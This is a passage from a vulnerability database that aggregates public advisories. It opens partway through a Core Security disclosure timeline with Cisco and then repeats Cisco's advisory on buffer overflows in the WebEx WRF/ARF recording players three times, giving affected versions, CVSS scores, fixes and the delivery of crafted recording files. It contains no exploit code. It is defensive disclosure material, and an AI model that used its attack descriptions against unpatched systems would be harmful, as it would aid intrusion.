attached which includes an updated timeline. 2010-10-30:
Cisco PSIRT replies acknowledging the vulnerability, stating that they
were able to reproduce code execution results in the currently released
version of WebEx, and a crash in their current development version.
Cisco also states that there is not information yet from their
development team about when a fix for this vulnerability will be released. 2010-11-09:
Core replies offering more technical details about exploitation if they
are needed, and reminding Cisco that the crash in their development
version may also be exploitable even if the current proof of concept
exploit only crashes it. The publication date for this advisory is
rescheduled to November 22nd 2010. Core states that they will like to
schedule a firm date for the release of information about this
vulnerability to the public and hence would like to get more information
from Cisco about the schedule for the release of a fix. 2010-11-15:
Cisco states that fixed code will be deployed in mid-December, but since
WebEx Meeting Center runs on a SaaS environment it takes about four or
five weeks for all clients to be running the latest version of the code. 2010-12-06:
Cisco contacts Core since no reply was received in the past two weeks,
and clarifies that a fix will be deployed on December 15th and should be
done on January 11th 2011. 2010-12-06:
Core states that they believe this advisory should be released as soon
as the fix is deployed, since diffing the WebEx binary on the client
side gives full details about the WebEx Meeting Center vulnerability to
an average skilled reverse engineer. Core schedules the publication of
this advisory to December 15th 2010. 2010-12-07:
Cisco contacts Core stating that releasing details about this
vulnerability would endanger customers, since there is no action they
can take to protect themselves because the responsibility of upgrading
the code ran by the customer falls on Cisco. Cisco mentions that "many
of these customers are probably shared between Cisco and Core Security". 2010-12-10:
Cisco contacts Core stating that they have just discovered the WebEx
Meeting Center Vulnerability affects a new set of customers that where
not accounted for originally. These are customers running T27SP21 that
can not be upgraded to SP22. An emergency patch will be released for
SP21 in January 2011, and this sets back the date when all clients
should be running an updated version to the "end of January, beginning
of February."
. 2010-12-14:
Core proposes to split this advisory into two different advisories to
better accommodate the WebEx Meeting Center SaaS release cycle. On one
advisory, the .wrf client side vulnerability would be described, and the
other would be dedicated to the WebEx Meeting Center vulnerability that
may compromise a meeting's host computer. Core believes this mitigates
the risk in a more effective way, since clients can update WebEx Player
by themselves on December 15th (the date when Cisco stated the fixed
version would be released) and no details of the Meeting Center
vulnerability would be released until all clients are running an updated
version. 2010-12-15:
Cisco states they wouldn't like the advisory to be splitted, and that
they prefer Core Security Technologies to go ahead and release
information about both vulnerabilities. 2010-12-15:
Core states that they prefer to release two advisories because these are
two different bugs, in two pieces of software, each one of them with a
differently working update channel determined by the vendor. Core also
informs Cisco that the download link for WebEx Player points to a
vulnerable version as of today, and asks Cisco to clarify what date they
meant as mid-December, since Core would like to know when a fixed
version of WebEx Player will be available for download to be able to
publish the WebEx Player vulnerability. 2010-12-16:
Cisco replies saying that releasing two advisories seems like a good
plan to them. Cisco also states that since many of their customers
observe a lockdown policy during the holidays season, they take a "don't
upgrade" policy of their own until Monday January 10th, 2011. That is
the reason why the download link of WebEx Player has not been changed yet. 2011-01-10:
Core states that they are ready to release this advisory on January
11th, and that releasing two separate advisories seems pointless now
because the release date of both would be very similar, and the original
idea was to mitigate the risk posed by the .wrf vulnerability. Core also
states that they are reviewing the best course of action to take with
the issue regarding clients running the old version of WebEx (T27SP21)
that according to Cisco are unable to upgrade to SP22 since this was not
accounted for previously. 2011-01-13:
Core states that since they have committed previously to release the
advisory taking into account Cisco's consideration about their SaaS
patch deploy model, when factoring the issue of clients running the SP21
version of Meeting Center scheduled by Cisco for emergency update on
January, a release date of January the 31st seems reasonable. This date
should be taken as final and Core Security Technologies believes it
takes into account all information given by Cisco about SaaS updating
timeframes. If this is not the case Cisco is asked to rectify ASAP. 2011-01-14:
Cisco confirms that the timeframe (publishing both vulnerabilities on
January 31st) works for them. 2011-01-31:
The advisory CORE-2010-1001 is published.
10. *References*
[1] [http://www.webex.com/]
[2]
[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek]
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com].
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].
13. *Disclaimer*
The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iEYEARECAAYFAk1HJwcACgkQyNibggitWa13VwCfVg6jVkuv3PhqmhNqZFIQO7CB
L1YAni1ONdRqEYczbkvki9r0Y7nr9cIQ
=9HdA
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0307 | CVE-2010-3041 | Cisco WRF and ARF Player T27LB Vulnerable to buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to atas32.dll, a different vulnerability than CVE-2010-3042, CVE-2010-3043, and CVE-2010-3044. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
The Cisco WebEx Players are applications that are used to play back
WebEx meeting recordings that have been recorded on the computer of
an on-line meeting attendee. The players can be automatically
installed when the user accesses a recording file that is hosted on a
WebEx server. The player can also be manually installed for offline
playback after downloading the application from www.webex.com
If the WebEx recording player was automatically installed, it will be
automatically upgraded to the latest, non-vulnerable version when
users access a recording file that is hosted on a WebEx server. If
the WebEx recording player was manually installed, users will need to
manually install a new version of the player after downloading the
latest version from www.webex.com
Cisco has released free software updates that address these
vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml.
Affected Products
=================
Vulnerable Products
+------------------
The vulnerabilities disclosed in this advisory affect the Cisco WebEx
recording players. Microsoft Windows, Apple Mac OS X, and Linux
versions of the player are all affected. Affected versions of the
players are those prior to client builds T27LC SP22 and T27LB SP21
EP3. Customers who have contractual agreements that prevent WebEx
from automatically upgrading a recording player to the latest version
should contact their account manager to determine upgrade options.
To determine whether a Cisco WebEx server is running an affected
version of the WebEx client build, users can log in to their Cisco
WebEx server and go to the Support > Downloads section. The version
of the WebEx client build will be displayed on the right side of the
page under "About Support Center." See "Software Versions and Fixes"
for details.
Cisco recommends that users upgrade to the most current version of
the player that is available from www.webex.com/downloadplayer.html
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
The WebEx meeting service is a hosted multimedia conferencing
solution that is managed and maintained by Cisco WebEx. The WRF and
ARF file formats are used to store WebEx meeting recordings that have
been recorded on the computer of an on-line meeting attendee. The
players are applications that are used to play back and edit
recording files (files with .wrf and .arf extensions). The recording
players can be automatically installed when the user accesses a
recording file that is hosted on a WebEx server (for stream playback
mode). The recording players can also be manually installed after
downloading the application from www.webex.com/downloadplayer.html
to play back recording files locally (for offline
playback mode).
Multiple buffer overflow vulnerabilities exist in the WRF and ARF
players. The vulnerabilities may lead to a crash of the player
application or, in some cases, remote code execution could occur.
To exploit one of these vulnerabilities, the player application would
need to open a malicious WRF or ARF file. An attacker may be able to
accomplish this exploit by providing the malicious recording file
directly to users (for example, by using e-mail) or by directing a
user to a malicious web page. The vulnerability cannot be triggered
by users who are attending a WebEx meeting.
These vulnerabilities have been assigned the following Common
Vulnerabilities and Exposures (CVE) identifiers:
* CVE-2010-3269
* CVE-2010-3041
* CVE-2010-3042
* CVE-2010-3043
* CVE-2010-3044
Vulnerability Scoring Details
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities described in this
document could result in a crash of the Cisco WebEx ARF Player or WRF
Player application and, in some cases, allow a remote attacker to
execute arbitrary code on the system with the privileges of the user
who is running the recording player application.
Software Versions and Fixes
===========================
When considering software upgrades, also consult http://www.cisco.com/go/psirt
and any subsequent advisories to determine exposure and a
complete upgrade solution.
These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21
EP3. For customers who are running T27LC SP22, the client build will
be represented as 27.22SP.0.9253. The fix for customers who are
running T27LB SP21 will be deployed by WebEx over the next few weeks.
The client build will be determined after the software is deployed.
The client build is listed in the Support > Downloads section of the
WebEx page after a user authenticates. WebEx bug fixes are cumulative
in a major release. For example, if release 27.22SP.0 is fixed,
release 27.22SP.1 will also have the software fix.
If a recording player was automatically installed, it will be
automatically upgraded to the latest, nonvulnerable version when
users access a recording file that is hosted on a WebEx server.
If a WebEx recording player was manually installed, users will need
to manually install a new version of the player after downloading the
latest version from www.webex.com/downloadplayer.html
Workarounds
===========
There are no workarounds for the vulnerabilities disclosed in this
advisory.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
These vulnerabilities were either found during internal testing or
reported to Cisco by a variety of sources, including Core Security,
TippingPoint, and Fortinet's FortiGuard Labs.
Cisco would like to thank these organizations for reporting these
vulnerabilities.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-Feb-01 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.14 (Darwin)
iF4EAREIAAYFAk1IQjoACgkQQXnnBKKRMNCpdQEAg/vWtP38VKH2ZDeL9QMQfx6E
M8nIZdeL2XGonJpT60IA/0APzTbZPE+9rWTi1Z0lJqIgCjHls3jo+sGQWSPvxxkS
=Ur/Y
-----END PGP SIGNATURE-----
| VAR-201102-0310 | CVE-2010-3044 | Cisco WRF and ARF Player T27LB Vulnerable to buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to atas32.dll, a different vulnerability than CVE-2010-3041, CVE-2010-3042, and CVE-2010-3043. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
The Cisco WebEx Players are applications that are used to play back
WebEx meeting recordings that have been recorded on the computer of
an on-line meeting attendee. The players can be automatically
installed when the user accesses a recording file that is hosted on a
WebEx server. The player can also be manually installed for offline
playback after downloading the application from www.webex.com
If the WebEx recording player was automatically installed, it will be
automatically upgraded to the latest, non-vulnerable version when
users access a recording file that is hosted on a WebEx server. If
the WebEx recording player was manually installed, users will need to
manually install a new version of the player after downloading the
latest version from www.webex.com
Cisco has released free software updates that address these
vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml.
Affected Products
=================
Vulnerable Products
+------------------
The vulnerabilities disclosed in this advisory affect the Cisco WebEx
recording players. Microsoft Windows, Apple Mac OS X, and Linux
versions of the player are all affected. Affected versions of the
players are those prior to client builds T27LC SP22 and T27LB SP21
EP3. Customers who have contractual agreements that prevent WebEx
from automatically upgrading a recording player to the latest version
should contact their account manager to determine upgrade options.
To determine whether a Cisco WebEx server is running an affected
version of the WebEx client build, users can log in to their Cisco
WebEx server and go to the Support > Downloads section. The version
of the WebEx client build will be displayed on the right side of the
page under "About Support Center." See "Software Versions and Fixes"
for details.
Cisco recommends that users upgrade to the most current version of
the player that is available from www.webex.com/downloadplayer.html
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
The WebEx meeting service is a hosted multimedia conferencing
solution that is managed and maintained by Cisco WebEx. The WRF and
ARF file formats are used to store WebEx meeting recordings that have
been recorded on the computer of an on-line meeting attendee. The
players are applications that are used to play back and edit
recording files (files with .wrf and .arf extensions). The recording
players can be automatically installed when the user accesses a
recording file that is hosted on a WebEx server (for stream playback
mode). The recording players can also be manually installed after
downloading the application from www.webex.com/downloadplayer.html
to play back recording files locally (for offline
playback mode).
Multiple buffer overflow vulnerabilities exist in the WRF and ARF
players. The vulnerabilities may lead to a crash of the player
application or, in some cases, remote code execution could occur.
To exploit one of these vulnerabilities, the player application would
need to open a malicious WRF or ARF file. An attacker may be able to
accomplish this exploit by providing the malicious recording file
directly to users (for example, by using e-mail) or by directing a
user to a malicious web page. The vulnerability cannot be triggered
by users who are attending a WebEx meeting.
These vulnerabilities have been assigned the following Common
Vulnerabilities and Exposures (CVE) identifiers:
* CVE-2010-3269
* CVE-2010-3041
* CVE-2010-3042
* CVE-2010-3043
* CVE-2010-3044
Vulnerability Scoring Details
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities described in this
document could result in a crash of the Cisco WebEx ARF Player or WRF
Player application and, in some cases, allow a remote attacker to
execute arbitrary code on the system with the privileges of the user
who is running the recording player application.
Software Versions and Fixes
===========================
When considering software upgrades, also consult http://www.cisco.com/go/psirt
and any subsequent advisories to determine exposure and a
complete upgrade solution.
These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21
EP3. For customers who are running T27LC SP22, the client build will
be represented as 27.22SP.0.9253. The fix for customers who are
running T27LB SP21 will be deployed by WebEx over the next few weeks.
The client build will be determined after the software is deployed.
The client build is listed in the Support > Downloads section of the
WebEx page after a user authenticates. WebEx bug fixes are cumulative
in a major release. For example, if release 27.22SP.0 is fixed,
release 27.22SP.1 will also have the software fix.
If a recording player was automatically installed, it will be
automatically upgraded to the latest, nonvulnerable version when
users access a recording file that is hosted on a WebEx server.
If a WebEx recording player was manually installed, users will need
to manually install a new version of the player after downloading the
latest version from www.webex.com/downloadplayer.html
Workarounds
===========
There are no workarounds for the vulnerabilities disclosed in this
advisory.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
These vulnerabilities were either found during internal testing or
reported to Cisco by a variety of sources, including Core Security,
TippingPoint, and Fortinet's FortiGuard Labs.
Cisco would like to thank these organizations for reporting these
vulnerabilities.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-Feb-01 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.14 (Darwin)
iF4EAREIAAYFAk1IQjoACgkQQXnnBKKRMNCpdQEAg/vWtP38VKH2ZDeL9QMQfx6E
M8nIZdeL2XGonJpT60IA/0APzTbZPE+9rWTi1Z0lJqIgCjHls3jo+sGQWSPvxxkS
=Ur/Y
-----END PGP SIGNATURE-----
| VAR-201102-0308 | CVE-2010-3042 | Cisco WRF and ARF Player T27LB Vulnerable to buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, a different vulnerability than CVE-2010-3041, CVE-2010-3043, and CVE-2010-3044. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
The Cisco WebEx Players are applications that are used to play back
WebEx meeting recordings that have been recorded on the computer of
an on-line meeting attendee. The players can be automatically
installed when the user accesses a recording file that is hosted on a
WebEx server. The player can also be manually installed for offline
playback after downloading the application from www.webex.com
If the WebEx recording player was automatically installed, it will be
automatically upgraded to the latest, non-vulnerable version when
users access a recording file that is hosted on a WebEx server. If
the WebEx recording player was manually installed, users will need to
manually install a new version of the player after downloading the
latest version from www.webex.com
Cisco has released free software updates that address these
vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml.
Affected Products
=================
Vulnerable Products
+------------------
The vulnerabilities disclosed in this advisory affect the Cisco WebEx
recording players. Microsoft Windows, Apple Mac OS X, and Linux
versions of the player are all affected. Affected versions of the
players are those prior to client builds T27LC SP22 and T27LB SP21
EP3. Customers who have contractual agreements that prevent WebEx
from automatically upgrading a recording player to the latest version
should contact their account manager to determine upgrade options.
To determine whether a Cisco WebEx server is running an affected
version of the WebEx client build, users can log in to their Cisco
WebEx server and go to the Support > Downloads section. The version
of the WebEx client build will be displayed on the right side of the
page under "About Support Center." See "Software Versions and Fixes"
for details.
Cisco recommends that users upgrade to the most current version of
the player that is available from www.webex.com/downloadplayer.html
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
The WebEx meeting service is a hosted multimedia conferencing
solution that is managed and maintained by Cisco WebEx. The WRF and
ARF file formats are used to store WebEx meeting recordings that have
been recorded on the computer of an on-line meeting attendee. The
players are applications that are used to play back and edit
recording files (files with .wrf and .arf extensions). The recording
players can be automatically installed when the user accesses a
recording file that is hosted on a WebEx server (for stream playback
mode). The recording players can also be manually installed after
downloading the application from www.webex.com/downloadplayer.html
to play back recording files locally (for offline
playback mode).
Multiple buffer overflow vulnerabilities exist in the WRF and ARF
players. The vulnerabilities may lead to a crash of the player
application or, in some cases, remote code execution could occur.
To exploit one of these vulnerabilities, the player application would
need to open a malicious WRF or ARF file. An attacker may be able to
accomplish this exploit by providing the malicious recording file
directly to users (for example, by using e-mail) or by directing a
user to a malicious web page. The vulnerability cannot be triggered
by users who are attending a WebEx meeting.
These vulnerabilities have been assigned the following Common
Vulnerabilities and Exposures (CVE) identifiers:
* CVE-2010-3269
* CVE-2010-3041
* CVE-2010-3042
* CVE-2010-3043
* CVE-2010-3044
Vulnerability Scoring Details
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities described in this
document could result in a crash of the Cisco WebEx ARF Player or WRF
Player application and, in some cases, allow a remote attacker to
execute arbitrary code on the system with the privileges of the user
who is running the recording player application.
Software Versions and Fixes
===========================
When considering software upgrades, also consult http://www.cisco.com/go/psirt
and any subsequent advisories to determine exposure and a
complete upgrade solution.
These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21
EP3. For customers who are running T27LC SP22, the client build will
be represented as 27.22SP.0.9253. The fix for customers who are
running T27LB SP21 will be deployed by WebEx over the next few weeks.
The client build will be determined after the software is deployed.
The client build is listed in the Support > Downloads section of the
WebEx page after a user authenticates. WebEx bug fixes are cumulative
in a major release. For example, if release 27.22SP.0 is fixed,
release 27.22SP.1 will also have the software fix.
If a recording player was automatically installed, it will be
automatically upgraded to the latest, nonvulnerable version when
users access a recording file that is hosted on a WebEx server.
If a WebEx recording player was manually installed, users will need
to manually install a new version of the player after downloading the
latest version from www.webex.com/downloadplayer.html
Workarounds
===========
There are no workarounds for the vulnerabilities disclosed in this
advisory.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
These vulnerabilities were either found during internal testing or
reported to Cisco by a variety of sources, including Core Security,
TippingPoint, and Fortinet's FortiGuard Labs.
Cisco would like to thank these organizations for reporting these
vulnerabilities.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-Feb-01 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
